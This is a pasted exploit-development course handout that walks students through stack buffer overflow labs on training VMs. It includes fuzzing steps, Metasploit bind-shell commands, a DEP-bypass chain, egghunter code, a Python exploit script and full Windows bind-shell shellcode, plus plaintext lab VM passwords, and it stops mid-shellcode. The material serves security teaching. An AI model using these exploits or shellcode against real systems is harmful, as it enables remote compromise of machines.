Advertisement
joemccray

San Diego Exploit Development 2018

Nov 14th, 2017
3,802
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
  1. San Diego Exploit Development 2018
  2.  
  3. Whitepapers of interest:
  4. https://www.sans.org/reading-room/whitepapers/firewalls/tactical-data-diodes-industrial-automation-control-systems-36057
  5.  
  6.  
  7.  
  8.  
  9.  
  10. #######################
  11. # VMs for this course #
  12. #######################
  13. https://s3.amazonaws.com/infosecaddictsvirtualmachines/Win7x64.zip
  14. username: workshop
  15. password: password
  16.  
  17. https://s3.amazonaws.com/infosecaddictsvirtualmachines/InfoSecAddictsVM.zip
  18. user: infosecaddicts
  19. pass: infosecaddicts
  20.  
  21. You don't have to, but you can do the updates in the Win7 VM (yes, it is a lot of updates).
  22.  
  23.  
  24.  
  25.  
  26.  
  27. #######################################################
  28. # Files you may find helpful for learning Exploit Dev #
  29. #######################################################
  30. https://s3.amazonaws.com/secureninja/files/slides.zip
  31. https://s3.amazonaws.com/secureninja/files/ExploitDevProcessDocs.zip
  32.  
  33.  
  34. #####################################
  35. # Quick Stack Based Buffer Overflow #
  36. #####################################
  37.  
  38. - You can download everything you need for this exercise (except netcat) from the link below
  39. https://s3.amazonaws.com/infosecaddictsfiles/ExploitLab.zip
  40.  
  41. - Extract this zip file to your Desktop
  42.  
  43. - Go to folder C:\Users\Workshop\Desktop\ExploitLab\2-VulnServer, and run vulnserv.exe
  44.  
  45. - Open a new command prompt and type:
  46.  
  47. ---------------------------Type This-----------------------------------
  48.  
  49. nc localhost 9999
  50. -----------------------------------------------------------------------
  51.  
  52. - In the new command prompt window where you ran nc type:
  53. HELP
  54.  
  55. - Go to folder C:\Users\Workshop\Desktop\ExploitLab\4-AttackScripts
  56. - Right-click on 1-simplefuzzer.py and choose the option edit with notepad++
  57.  
  58. - Now double-click on 1-simplefuzzer.py
  59. - You'll notice that vulnserv.exe crashes. Be sure to note what command and the number of As it crashed on.
  60.  
  61.  
  62. - Restart vulnserv, and run 1-simplefuzzer.py again. Be sure to note what command and the number of As it crashed on.
  63.  
  64. - Now go to folder C:\Users\Workshop\Desktop\ExploitLab\3-OllyDBG and start OllyDBG. Choose 'File' -> 'Attach' and attach to process vulnserv.exe
  65.  
  66. - Go back to folder C:\Users\Workshop\Desktop\ExploitLab\4-AttackScripts and double-click on 1-simplefuzzer.py.
  67.  
  68. - Take note of the registers (EAX, ESP, EBP, EIP) that have been overwritten with As (41s).
  69.  
  70. - Now isolate the crash by restarting your debugger and running script 2-3000chars.py
  71.  
  72. - Calculate the distance to EIP by running script 3-3000chars.py
  73. - This script sends 3000 nonrepeating chars to vulserv.exe and populates EIP with the value: 396F4338
  74.  
  75. 4-count-chars-to-EIP.py
  76. - In the previous script we see that EIP is overwritten with 396F4338 is 8 (38), C (43), o (6F), 9 (39)
  77. - so we search for 8Co9 in the string of nonrepeating chars and count the distance to it
  78.  
  79. 5-2006char-eip-check.py
  80. - In this script we check to see if our math is correct in our calculation of the distance to EIP by overwriting EIP with 42424242
  81.  
  82. 6-jmp-esp.py
  83. - In this script we overwrite EIP with a JMP ESP (6250AF11) inside of essfunc.dll
  84.  
  85. 7-first-exploit
  86. - In this script we actually do the stack overflow and launch a bind shell on port 4444
  87.  
  88. 8 - Take a look at the file vulnserv.rb and place it in your Ubuntu host via SCP or copy it and paste the code into the host.
  89.  
  90.  
  91. ---------------------------Type This-----------------------------------
  92.  
  93. cd /home/infosecaddicts/toolz/metasploit/modules/exploits/windows/misc
  94.  
  95. vi vulnserv.rb (paste the code into this file)
  96.  
  97.  
  98. cd ~/toolz/metasploit
  99.  
  100. ./msfconsole
  101.  
  102.  
  103.  
  104. use exploit/windows/misc/vulnserv
  105. set PAYLOAD windows/meterpreter/bind_tcp
  106. set RHOST CHANGEME-TO-YOUR-WIN7-IP
  107. set RPORT 9999
  108. exploit
  109.  
  110. -----------------------------------------------------------------------------------
  111. Day 1 Homework:
  112. Watch the following videos and take notes for questions tomorrow.
  113.  
  114. http://www.securitytube.net/video/1389
  115. http://www.securitytube.net/video/1398
  116. http://www.securitytube.net/video/1399
  117.  
  118.  
  119.  
  120. -----------------------------------------------------------------------------------------------------------------------
  121.  
  122. #########
  123. # Day 2 #
  124. #########
  125. You can download the Secure Ninja courseware here:
  126. https://s3.amazonaws.com/secureninja/files/SecureNinja+-+64-bit+Windows+Exploit+Development+Course.docx
  127.  
  128.  
  129. Morning challenge:
  130. Your task is to convert the SLMail 5.5 exploit (https://www.exploit-db.com/exploits/646) to the multiple script format used yesterday with vulnserver.
  131.  
  132.  
  133.  
  134. Day 2 Homework:
  135. Watch the following videos and take notes for questions tomorrow.
  136. http://www.securitytube.net/video/1406
  137. http://www.securitytube.net/video/1407
  138. http://www.securitytube.net/video/1408
  139.  
  140.  
  141.  
  142.  
  143. -----------------------------------------------------------------------------------------------------------------------
  144.  
  145. #########
  146. # Day 3 #
  147. #########
  148. You can download the Secure Ninja courseware here:
  149. https://s3.amazonaws.com/secureninja/files/SecureNinja+-+64-bit+Windows+Exploit+Development+Course.docx
  150.  
  151.  
  152. Morning challenge:
  153. Your task is to convert the Easy File Sharing Web Server 7.2 exploit (https://www.exploit-db.com/exploits/39008/) to the multiple script format used with vulnserver and SLMail on your Windows 7 host machine.
  154.  
  155. NOTE: If you did the SMail exploit on Windows XP yesterday, then please do it on Windows 7 today prior to doing the Easy File Sharing Web Server 7.2 exploit.
  156.  
  157.  
  158.  
  159. Day 3 Homework:
  160. Watch the following videos and take notes for questions tomorrow.
  161. https://s3.amazonaws.com/secureninja/videos/0006-Intro-to-Mona.mp4
  162. https://s3.amazonaws.com/secureninja/videos/0007-Mona-continued.mp4
  163. https://s3.amazonaws.com/secureninja/videos/0014-DEP-Basics.mp4
  164. https://s3.amazonaws.com/secureninja/videos/0015-Bypassing-DEP-using-ROP-chains.mp4
  165.  
  166.  
  167.  
  168. #########
  169. # Day 4 #
  170. #########
  171. You can download the Secure Ninja courseware here:
  172. https://s3.amazonaws.com/secureninja/files/SecureNinja+-+64-bit+Windows+Exploit+Development+Course.docx
  173.  
  174.  
  175. Morning challenge:
  176. Your task is to convert the Konica Minolta exploit (https://www.exploit-db.com/exploits/39215/, https://www.exploit-db.com/exploits/38252/, https://www.exploit-db.com/exploits/38254/) to the multiple script format used with vulnserver, SLMail, and Easy File Sharing Web Server 7.2 on your Windows 7 host machine.
  177.  
  178.  
  179.  
  180. -------------------------------------------------------------------
  181. All of the content
  182.  
  183. You can download the Exploit Dev VMs from the links below:
  184. https://s3.amazonaws.com/infosecaddictsvirtualmachines/XPSP3-ED-Target.zip
  185. https://s3.amazonaws.com/infosecaddictsvirtualmachines/Strategicsec-XP-ED-Attack-Host.zip
  186. user: Administrator
  187. pass: strategicsec
  188.  
  189. https://s3.amazonaws.com/infosecaddictsvirtualmachines/StrategicsecUbuntu-v3.zip
  190. user: strategicsec
  191. pass: strategicsec
  192.  
  193.  
  194. https://s3.amazonaws.com/infosecaddictsvirtualmachines/asterisk.zip
  195. user: exploitlab
  196. pass: exploitlab
  197.  
  198.  
  199. All of the exploit script listed below is contained in the following zip file. Please download it to your XP-ED-Attack-Host VM. The password for the zip file is: joemccray
  200.  
  201. https://s3.amazonaws.com/infosecaddictsfiles/ED-Workshop-Files.zip
  202.  
  203. ###########################
  204. # Lab 1a: Stack Overflows #
  205. ###########################
  206.  
  207. #################################
  208. # Start WarFTPd #
  209. # Start WinDBG #
  210. # Press F6 #
  211. # Attach to war-ftpd.exe #
  212. #################################
  213.  
  214. ---------------------------Type This-----------------------------------
  215.  
  216. cd C:\Documents and Settings\strategic security\Desktop\ED-Workshop-Files\Lab1a
  217.  
  218.  
  219. python warftpd1.py | nc XPSP3-ED-Target-IP 21
  220. -----------------------------------------------------------------------
  221.  
  222. At WINDBG prompt
  223. “r” to show registers or “alt+4”
  224.  
  225. ---------------------------Type This-----------------------------------
  226.  
  227. dd esp
  228. -----------------------------------------------------------------------
  229.  
  230. ---------------------------Type This-----------------------------------
  231.  
  232. python warftpd2.py | nc XPSP3-ED-Target-IP 21
  233. -----------------------------------------------------------------------
  234.  
  235.  
  236. At WINDBG prompt
  237. “r” to show registers or “alt+4”
  238.  
  239. ---------------------------Type This-----------------------------------
  240.  
  241. dd esp
  242. -----------------------------------------------------------------------
  243.  
  244. Eip: 32714131
  245. esp: affd58 (71413471)
  246.  
  247. Now we need to SSH into the StrategicSec Ubuntu host
  248.  
  249. ---------------------------Type This-----------------------------------
  250.  
  251. cd /home/strategicsec/toolz/metasploit/tools
  252.  
  253. ruby pattern_offset.rb 32714131
  254. 485
  255.  
  256. ruby pattern_offset.rb 71413471
  257. 493
  258. -----------------------------------------------------------------------
  259.  
  260. Distance to EIP is: 485
  261. Relative position of ESP is: 493
  262.  
  263. RET – POP EIP
  264. RET 4 – POP EIP and shift ESP down by 4 bytes
  265.  
  266. ---------------------------Type This-----------------------------------
  267.  
  268. cd /home/strategicsec/toolz/metasploit/
  269. ./msfpescan -j ESP DLLs/xpsp3/shell32.dll
  270. -----------------------------------------------------------------------
  271.  
  272. 0x7c9c167d push esp; retn 0x304d
  273. 0x7c9d30d7 jmp esp < - how about we use this one
  274. 0x7c9d30eb jmp esp
  275. 0x7c9d30ff jmp esp
  276.  
  277.  
  278. warftpd3.py with Notepad++
  279. Fill in the appropriate values
  280. Distance to EIP
  281. Address of JMP ESP
  282.  
  283.  
  284. ---------------------------Type This-----------------------------------
  285.  
  286. python warftpd3.py | nc XPSP3-ED-Target-IP 21
  287.  
  288. 0:003> dd eip
  289. 0:003> dd esp
  290. -----------------------------------------------------------------------
  291.  
  292.  
  293.  
  294.  
  295.  
  296. Mention bad characters
  297. No debugger
  298.  
  299.  
  300. ---------------------------Type This-----------------------------------
  301.  
  302. python warftpd4.py | nc XPSP3-ED-Target-IP 21
  303.  
  304. nc XPSP3-ED-Target-IP 4444
  305. -----------------------------------------------------------------------
  306.  
  307.  
  308.  
  309. ###########################################
  310. # Lab 1b: Stack Overflows with DEP Bypass #
  311. ###########################################
  312.  
  313. Reboot your target host and choose the "2nd" option for DEP.
  314.  
  315.  
  316. cd C:\Documents and Settings\strategic security\Desktop\ED-Workshop-Files\Lab1b
  317.  
  318.  
  319. ---------------------------Type This-----------------------------------
  320.  
  321. python warftpd1.py | nc XPSP3-ED-Target-IP 21
  322.  
  323. At WINDBG prompt
  324. “r” to show registers or “alt+4”
  325.  
  326. dd esp
  327.  
  328.  
  329.  
  330.  
  331. python warftpd2.py | nc XPSP3-ED-Target-IP 21
  332.  
  333.  
  334. At WINDBG prompt
  335. “r” to show registers or “alt+4”
  336. dd esp
  337. -----------------------------------------------------------------------
  338.  
  339. Eip: 32714131
  340. esp: affd58 (71413471)
  341.  
  342. Now we need to SSH into the StrategicSec Ubuntu host
  343.  
  344. ---------------------------Type This-----------------------------------
  345.  
  346. cd /home/strategicsec/toolz/metasploit/tools
  347.  
  348. ruby pattern_offset.rb 32714131
  349. 485
  350.  
  351. ruby pattern_offset.rb 71413471
  352. 493
  353.  
  354.  
  355.  
  356.  
  357.  
  358.  
  359.  
  360.  
  361. cd /home/strategicsec/toolz/metasploit/tools
  362.  
  363. ruby pattern_offset.rb 32714131
  364.  
  365. cd /home/strategicsec/toolz/metasploit/
  366.  
  367. ./msfpescan -j ESP DLLs/xpsp3/shell32.dll | grep 0x7c9d30d7
  368.  
  369.  
  370.  
  371. python warftpd3.py | nc XPSP3-ED-Target-IP 21
  372.  
  373. 0:003> dd eip
  374. 0:003> dd esp
  375.  
  376. INT3s - GOOD!!!!!!!
  377.  
  378.  
  379.  
  380. python warftpd4.py | nc XPSP3-ED-Target-IP 21
  381.  
  382. nc XPSP3-ED-Target-IP 4444
  383. -----------------------------------------------------------------------
  384.  
  385.  
  386. strategicsec....exploit no workie!!!!
  387.  
  388.  
  389. Why????????? DEP!!!!!!!!!!!!!
  390.  
  391.  
  392.  
  393.  
  394. Let's look through ole32.dll for the following instructions:
  395.  
  396. mov al,0x1
  397. ret 0x4
  398.  
  399. We need to set al to 0x1 for the LdrpCheckNXCompatibility routine.
  400.  
  401.  
  402. ---------------------------Type This-----------------------------------
  403.  
  404. ./msfpescan -D -r "\xB0\x01\xC2\x04" DLLs/xpsp3/ole32.dll
  405. -----------------------------------------------------------------------
  406.  
  407. [DLLs/xpsp3/ole32.dll]
  408. 0x775ee00e b001c204
  409. 0x775ee00e mov al, 1
  410. 0x775ee010 ret 4
  411.  
  412.  
  413. Then we need to jump to the LdrpCheckNXCompatibility routine in
  414. ntdll.dll that disables DEP.
  415.  
  416.  
  417.  
  418. Inside of ntdll.dll we need to find the following instructions:
  419.  
  420. CMP AL,1
  421. PUSH 2
  422. POP ESI
  423. JE ntdll.7
  424.  
  425.  
  426. ---------------------------Type This-----------------------------------
  427.  
  428. ./msfpescan -D -r "\x3C\x01\x6A\x02\x5E\x0F\x84" DLLs/xpsp3/ntdll.dll
  429. -----------------------------------------------------------------------
  430.  
  431. [DLLs/xpsp3/ntdll.dll]
  432. 0x7c91cd24 3c016a025e0f84
  433. 0x7c91cd24 cmp al, 1
  434. 0x7c91cd26 push 2
  435. 0x7c91cd28 pop esi
  436. 0x7c91cd29 jz 7
  437.  
  438.  
  439. This set of instructions makes sure that AL is set to 1, 2 is pushed
  440. on the stack then popped into ESI.
  441.  
  442.  
  443.  
  444.  
  445. ---------------------------Type This-----------------------------------
  446.  
  447. dep = "\x0e\xe0\x5e\x77"+\
  448. "\xff\xff\xff\xff"+\
  449. "\x24\xcd\x91\x7c"+\
  450. "\xff\xff\xff\xff"+\
  451. "A"*0x54
  452.  
  453.  
  454.  
  455.  
  456. python warftpd5.py | nc XPSP3-ED-Target-IP 21
  457.  
  458. nc XPSP3-ED-Target-IP 4444
  459. -----------------------------------------------------------------------
  460.  
  461.  
  462. ########################################
  463. # Lab 2a: Not Enough Space (Egghunter) #
  464. ########################################
  465.  
  466. ---------------------------Type This-----------------------------------
  467.  
  468. cd C:\Documents and Settings\strategic security\Desktop\ED-Workshop-Files\Lab2a\sws_skeleton
  469. -----------------------------------------------------------------------
  470.  
  471. SWS - SIMPLE WEB SERVER
  472. -----------------------
  473.  
  474. Running SWS on Strategicsec-XP-ED-Target-VM
  475. Start > Programs > Simple Web Server (it's in the middle somewhere)
  476. Red icon in system tray
  477. Double click it
  478. - it will pop up a menu
  479. - select "start"
  480. - dialog box shows starting params - port 82
  481.  
  482. WinDBG
  483. - attach to "server.exe"
  484.  
  485. ---------------------------Type This-----------------------------------
  486.  
  487. python sws1.py | nc XPSP3-ED-Target-IP 82
  488.  
  489.  
  490.  
  491. python sws2.py | nc XPSP3-ED-Target-IP 82
  492.  
  493.  
  494. SSH into the Ubuntu host (user: strategicsec/pass: strategicsec)
  495. cd /home/strategicsec/toolz/metasploit/tools
  496. ruby pattern_offset.rb 41356841 <------- You should see that EIP is at 225
  497. ruby pattern_offset.rb 68413668 <------- You should see that ESP is at 229
  498.  
  499. -----------------------------------------------------------------------
  500.  
  501.  
  502.  
  503.  
  504.  
  505.  
  506.  
  507. EGGHUNTER:
  508. ----------
  509.  
  510. "\x66\x81\xCA\xFF\x0F\x42\x52\x6A\x02\x58\xCD\x2E\x3C\x05\x5A\x74"
  511. "\xEF\xB8\x41\x42\x42\x41\x8B\xFA\xAF\x75\xEA\xAF\x75\xE7\xFF\xE7"
  512. ^^^^^^^^^^^^^^^^
  513. ABBA
  514. JMP ESP
  515. /
  516. /
  517. GET /AAAAAAAAAAA...225...AAAAAAAAAA[ EIP ]$egghunter HTTP/1.0
  518. User-Agent: ABBAABBA LARGE SHELLCODE (Alpha2 encoded)
  519.  
  520.  
  521.  
  522.  
  523. -----sws3.py-----
  524. #!/usr/bin/python2
  525.  
  526. import os # for output setting
  527. import sys
  528. import struct # for pack function
  529.  
  530. # turn off output buffer and set binary mode
  531. sys.stdout = os.fdopen(sys.stdout.fileno(), 'wb', 0)
  532.  
  533.  
  534. pad = "A" * 225 # distance to EIP
  535. eip = 0x7e429353 # replace EIP to point to "jmp esp" from user32.dll
  536.  
  537. egghunter = "\x66\x81\xCA\xFF\x0F\x42\x52\x6A\x02\x58\xCD\x2E\x3C\x05\x5A\x74"
  538. egghunter += "\xEF\xB8\x41\x42\x42\x41\x8B\xFA\xAF\x75\xEA\xAF\x75\xE7\xFF\xE7"
  539.  
  540. shellcode = "\xCC" * 700
  541.  
  542. buf = "GET /"
  543. buf += pad + struct.pack('<I', eip) + egghunter
  544. buf += " HTTP/1.0\r\n"
  545. buf += "User-Agent: ABBAABBA"
  546. buf += shellcode
  547. buf += " HTTP/1.0\r\n"
  548.  
  549. sys.stdout.write(buf)
  550. -----
  551.  
  552. ############################################
  553. # Lab 2b: Not Enough Space (Negative Jump) #
  554. ############################################
  555.  
  556. ---------------------------Type This-----------------------------------
  557.  
  558. cd C:\Documents and Settings\strategic security\Desktop\ED-Workshop-Files\Lab2a\modjk_skeleton
  559.  
  560. -----------------------------------------------------------------------
  561.  
  562. [pad = distance_to_seh - len(shellcode) ] [ shellcode] [jmp4 = "\x90\x90\xEB\x04"] [eip (pop pop ret)] [jmp_min = "\xE9\x98\xEF\xFF\xFF"]
  563.  
  564. ^
  565. 1 ----------------------1 overflow the buffer---------------------------|
  566.  
  567. ^ ^
  568. |
  569. 2 ----jump over seh record---|
  570.  
  571. ^ ^
  572. |
  573. 3--POP 2 words off stack---|
  574.  
  575. ^
  576. 4 -----negative jump into NOPs - then into shellcode -----------------------------------------------------------------------------------|
  577.  
  578.  
  579. #########################################
  580. # Lab 2c: Not Enough Space (Trampoline) #
  581. #########################################
  582.  
  583. ---------------------------Type This-----------------------------------
  584.  
  585. cd C:\Documents and Settings\strategic security\Desktop\ED-Workshop-Files\Lab2c\tftpd_skeleton
  586. -----------------------------------------------------------------------
  587.  
  588.  
  589. On the Strategicsec-XP-ED-Target-VM VM
  590.  
  591. - open a command prompt
  592. - c:\software\tftpd32
  593. - run tftpd32.exe
  594. - UDP port 69
  595. (socket code is already in the scripts)
  596.  
  597.  
  598.  
  599.  
  600. On your attack host please install:
  601.  
  602.  
  603. NASM - Netwide Assembler
  604.  
  605.  
  606.  
  607.  
  608.  
  609. -----------------------------------------------------------------------------------------------------------------
  610.  
  611.  
  612. We want to generate the shellcode (BIND SHELL on Port 4444)
  613. - No restricted characters
  614. - Encoder: NONE
  615.  
  616. Create a Python file called dumpshellcode.py
  617.  
  618. ---
  619. #!/usr/bin/python2
  620.  
  621. import os
  622. import sys
  623. import struct
  624.  
  625.  
  626. # win32_bind - EXITFUNC=seh LPORT=4444 Size=317 Encoder=None http://metasploit.com
  627. shellcode = "\xfc\x6a\xeb\x4d\xe8\xf9\xff\xff\xff\x60\x8b\x6c\x24\x24\x8b\x45"
  628. shellcode += "\x3c\x8b\x7c\x05\x78\x01\xef\x8b\x4f\x18\x8b\x5f\x20\x01\xeb\x49"
  629. shellcode += "\x8b\x34\x8b\x01\xee\x31\xc0\x99\xac\x84\xc0\x74\x07\xc1\xca\x0d"
  630. shellcode += "\x01\xc2\xeb\xf4\x3b\x54\x24\x28\x75\xe5\x8b\x5f\x24\x01\xeb\x66"
  631. shellcode += "\x8b\x0c\x4b\x8b\x5f\x1c\x01\xeb\x03\x2c\x8b\x89\x6c\x24\x1c\x61"
  632. shellcode += "\xc3\x31\xdb\x64\x8b\x43\x30\x8b\x40\x0c\x8b\x70\x1c\xad\x8b\x40"
  633. shellcode += "\x08\x5e\x68\x8e\x4e\x0e\xec\x50\xff\xd6\x66\x53\x66\x68\x33\x32"
  634. shellcode += "\x68\x77\x73\x32\x5f\x54\xff\xd0\x68\xcb\xed\xfc\x3b\x50\xff\xd6"
  635. shellcode += "\x5f\x89\xe5\x66\x81\xed\x08\x02\x55\x6a\x02\xff\xd0\x68\xd9\x09"
  636. shellcode += "\xf5\xad\x57\xff\xd6\x53\x53\x53\x53\x53\x43\x53\x43\x53\xff\xd0"
  637. shellcode += "\x66\x68\x11\x5c\x66\x53\x89\xe1\x95\x68\xa4\x1a\x70\xc7\x57\xff"
  638. shellcode += "\xd6\x6a\x10\x51\x55\xff\xd0\x68\xa4\xad\x2e\xe9\x57\xff\xd6\x53"
  639. shellcode += "\x55\xff\xd0\x68\xe5\x49\x86\x49\x57\xff\xd6\x50\x54\x54\x55\xff"
  640. shellcode += "\xd0\x93\x68\xe7\x79\xc6\x79\x57\xff\xd6\x55\xff\xd0\x66\x6a\x64"
  641. shellcode += "\x66\x68\x63\x6d\x89\xe5\x6a\x50\x59\x29\xcc\x89\xe7\x6a\x44\x89"
  642. shellcode += "\xe2\x31\xc0\xf3\xaa\xfe\x42\x2d\xfe\x42\x2c\x93\x8d\x7a\x38\xab"
  643. shellcode += "\xab\xab\x68\x72\xfe\xb3\x16\xff\x75\x44\xff\xd6\x5b\x57\x52\x51"
  644. shellcode += "\x51\x51\x6a\x01\x51\x51\x55\x51\xff\xd0\x68\xad\xd9\x05\xce\x53"
  645. shellcode += "\xff\xd6\x6a\xff\xff\x37\xff\xd0\x8b\x57\xfc\x83\xc4\x64\xff\xd6"
  646. shellcode += "\x52\xff\xd0\x68\xf0\x8a\x04\x5f\x53\xff\xd6\xff\xd0"
  647.  
  648. sys.stdout.write(shellcode)
  649. ---
  650.  
  651.  
  652.  
  653. python dumpshell.py > bindshell.bin
  654.  
  655. copy bindshellcode.bin into the "c:\Program Files\nasm" directory
  656.  
  657.  
  658.  
  659. Here we saved the raw shellcode generated by metasploit into a file called bindshell.bin
  660. 317 bindshell.bin
  661.  
  662. ---------------------------Type This-----------------------------------
  663.  
  664. C:\Program Files\nasm>ndisasm -b 32 bindshell.bin
  665. -----------------------------------------------------------------------
  666.  
  667. 00000000 FC cld
  668. 00000001 6AEB push byte -0x15
  669. 00000003 4D dec ebp
  670. 00000004 E8F9FFFFFF call dword 0x2
  671. 00000009 60 pushad
  672. 0000000A 8B6C2424 mov ebp,[esp+0x24]
  673. 0000000E 8B453C mov eax,[ebp+0x3c]
  674. 00000011 8B7C0578 mov edi,[ebp+eax+0x78]
  675. 00000015 01EF add edi,ebp
  676. 00000017 8B4F18 mov ecx,[edi+0x18]
  677. 0000001A 8B5F20 mov ebx,[edi+0x20]
  678. 0000001D 01EB add ebx,ebp
  679. 0000001F 49 dec ecx
  680. 00000020 8B348B mov esi,[ebx+ecx*4]
  681. 00000023 01EE add esi,ebp
  682. 00000025 31C0 xor eax,eax
  683. 00000027 99 cdq
  684. 00000028 AC lodsb
  685. 00000029 84C0 test al,al
  686. 0000002B 7407 jz 0x34
  687. 0000002D C1CA0D ror edx,0xd
  688. 00000030 01C2 add edx,eax
  689. 00000032 EBF4 jmp short 0x28
  690. 00000034 3B542428 cmp edx,[esp+0x28]
  691. 00000038 75E5 jnz 0x1f
  692. 0000003A 8B5F24 mov ebx,[edi+0x24]
  693. 0000003D 01EB add ebx,ebp
  694. 0000003F 668B0C4B mov cx,[ebx+ecx*2]
  695. 00000043 8B5F1C mov ebx,[edi+0x1c]
  696. 00000046 01EB add ebx,ebp
  697. 00000048 032C8B add ebp,[ebx+ecx*4]
  698. 0000004B 896C241C mov [esp+0x1c],ebp
  699. 0000004F 61 popad
  700. 00000050 C3 ret
  701. 00000051 31DB xor ebx,ebx
  702. 00000053 648B4330 mov eax,[fs:ebx+0x30]
  703. 00000057 8B400C mov eax,[eax+0xc]
  704. 0000005A 8B701C mov esi,[eax+0x1c]
  705. 0000005D AD lodsd
  706. 0000005E 8B4008 mov eax,[eax+0x8]
  707. 00000061 5E pop esi
  708. 00000062 688E4E0EEC push dword 0xec0e4e8e
  709. 00000067 50 push eax
  710. 00000068 FFD6 call esi
  711. 0000006A 6653 push bx
  712. 0000006C 66683332 push word 0x3233
  713. 00000070 687773325F push dword 0x5f327377
  714. 00000075 54 push esp
  715. 00000076 FFD0 call eax
  716. 00000078 68CBEDFC3B push dword 0x3bfcedcb
  717. 0000007D 50 push eax
  718. 0000007E FFD6 call esi PART 1
  719. 00000080 5F pop edi
  720. 00000081 89E5 mov ebp,esp
  721. 00000083 6681ED0802 sub bp,0x208
  722. 00000088 55 push ebp
  723. 00000089 6A02 push byte +0x2
  724. 0000008B FFD0 call eax
  725. 0000008D 68D909F5AD push dword 0xadf509d9
  726. 00000092 57 push edi
  727. 00000093 FFD6 call esi
  728. 00000095 53 push ebx
  729. 00000096 53 push ebx
  730. --------------------------------------------CUTCUTCUTCUTCUT----8<---8<---8<---
  731. 00000097 53 push ebx
  732. 00000098 53 push ebx
  733. 00000099 53 push ebx
  734. 0000009A 43 inc ebx
  735. 0000009B 53 push ebx
  736. 0000009C 43 inc ebx
  737. 0000009D 53 push ebx PART 2
  738. 0000009E FFD0 call eax
  739. 000000A0 6668115C push word 0x5c11
  740. 000000A4 6653 push bx
  741. 000000A6 89E1 mov ecx,esp
  742. 000000A8 95 xchg eax,ebp
  743. 000000A9 68A41A70C7 push dword 0xc7701aa4
  744. 000000AE 57 push edi
  745. 000000AF FFD6 call esi
  746. 000000B1 6A10 push byte +0x10
  747. 000000B3 51 push ecx
  748. 000000B4 55 push ebp
  749. 000000B5 FFD0 call eax
  750. 000000B7 68A4AD2EE9 push dword 0xe92eada4
  751. 000000BC 57 push edi
  752. 000000BD FFD6 call esi
  753. 000000BF 53 push ebx
  754. 000000C0 55 push ebp
  755. 000000C1 FFD0 call eax
  756. 000000C3 68E5498649 push dword 0x498649e5
  757. 000000C8 57 push edi
  758. 000000C9 FFD6 call esi
  759. 000000CB 50 push eax
  760. 000000CC 54 push esp
  761. 000000CD 54 push esp
  762. 000000CE 55 push ebp
  763. 000000CF FFD0 call eax
  764. 000000D1 93 xchg eax,ebx
  765. 000000D2 68E779C679 push dword 0x79c679e7
  766. 000000D7 57 push edi
  767. 000000D8 FFD6 call esi
  768. 000000DA 55 push ebp
  769. 000000DB FFD0 call eax
  770. 000000DD 666A64 push word 0x64
  771. 000000E0 6668636D push word 0x6d63
  772. 000000E4 89E5 mov ebp,esp
  773. 000000E6 6A50 push byte +0x50
  774. 000000E8 59 pop ecx
  775. 000000E9 29CC sub esp,ecx
  776. 000000EB 89E7 mov edi,esp
  777. 000000ED 6A44 push byte +0x44
  778. 000000EF 89E2 mov edx,esp
  779. 000000F1 31C0 xor eax,eax
  780. 000000F3 F3AA rep stosb
  781. 000000F5 FE422D inc byte [edx+0x2d]
  782. 000000F8 FE422C inc byte [edx+0x2c]
  783. 000000FB 93 xchg eax,ebx
  784. 000000FC 8D7A38 lea edi,[edx+0x38]
  785. 000000FF AB stosd
  786. 00000100 AB stosd
  787. 00000101 AB stosd
  788. 00000102 6872FEB316 push dword 0x16b3fe72
  789. 00000107 FF7544 push dword [ebp+0x44]
  790. 0000010A FFD6 call esi
  791. 0000010C 5B pop ebx
  792. 0000010D 57 push edi
  793. 0000010E 52 push edx
  794. 0000010F 51 push ecx
  795. 00000110 51 push ecx
  796. 00000111 51 push ecx
  797. 00000112 6A01 push byte +0x1
  798. 00000114 51 push ecx
  799. 00000115 51 push ecx
  800. 00000116 55 push ebp
  801. 00000117 51 push ecx
  802. 00000118 FFD0 call eax
  803. 0000011A 68ADD905CE push dword 0xce05d9ad
  804. 0000011F 53 push ebx
  805. 00000120 FFD6 call esi
  806. 00000122 6AFF push byte -0x1
  807. 00000124 FF37 push dword [edi]
  808. 00000126 FFD0 call eax
  809. 00000128 8B57FC mov edx,[edi-0x4]
  810. 0000012B 83C464 add esp,byte +0x64
  811. 0000012E FFD6 call esi
  812. 00000130 52 push edx
  813. 00000131 FFD0 call eax
  814. 00000133 68F08A045F push dword 0x5f048af0
  815. 00000138 53 push ebx
  816. 00000139 FFD6 call esi
  817. 0000013B FFD0 call eax
  818.  
  819.  
  820.  
  821.  
  822. part1 = "\xfc\x6a\xeb\x4d\xe8\xf9\xff\xff\xff\x60\x8b\x6c\x24\x24\x8b\x45"
  823. part1 += "\x3c\x8b\x7c\x05\x78\x01\xef\x8b\x4f\x18\x8b\x5f\x20\x01\xeb\x49"
  824. part1 += "\x8b\x34\x8b\x01\xee\x31\xc0\x99\xac\x84\xc0\x74\x07\xc1\xca\x0d"
  825. part1 += "\x01\xc2\xeb\xf4\x3b\x54\x24\x28\x75\xe5\x8b\x5f\x24\x01\xeb\x66"
  826. part1 += "\x8b\x0c\x4b\x8b\x5f\x1c\x01\xeb\x03\x2c\x8b\x89\x6c\x24\x1c\x61"
  827. part1 += "\xc3\x31\xdb\x64\x8b\x43\x30\x8b\x40\x0c\x8b\x70\x1c\xad\x8b\x40"
  828. part1 += "\x08\x5e\x68\x8e\x4e\x0e\xec\x50\xff\xd6\x66\x53\x66\x68\x33\x32"
  829. part1 += "\x68\x77\x73\x32\x5f\x54\xff\xd0\x68\xcb\xed\xfc\x3b\x50\xff\xd6"
  830. part1 += "\x5f\x89\xe5\x66\x81\xed\x08\x02\x55\x6a\x02\xff\xd0\x68\xd9\x09"
  831. part1 += "\xf5\xad\x57\xff\xd6\x53\x53"
  832.  
  833.  
  834. part2 = "\x53\x53\x53\x43\x53\x43\x53\xff\xd0"
  835. part2 += "\x66\x68\x11\x5c\x66\x53\x89\xe1\x95\x68\xa4\x1a\x70\xc7\x57\xff"
  836. part2 += "\xd6\x6a\x10\x51\x55\xff\xd0\x68\xa4\xad\x2e\xe9\x57\xff\xd6\x53"
  837. part2 += "\x55\xff\xd0\x68\xe5\x49\x86\x49\x57\xff\xd6\x50\x54\x54\x55\xff"
  838. part2 += "\xd0\x93\x68\xe7\x79\xc6\x79\x57\xff\xd6\x55\xff\xd0\x66\x6a\x64"
  839. part2 += "\x66\x68\x63\x6d\x89\xe5\x6a\x50\x59\x29\xcc\x89\xe7\x6a\x44\x89"
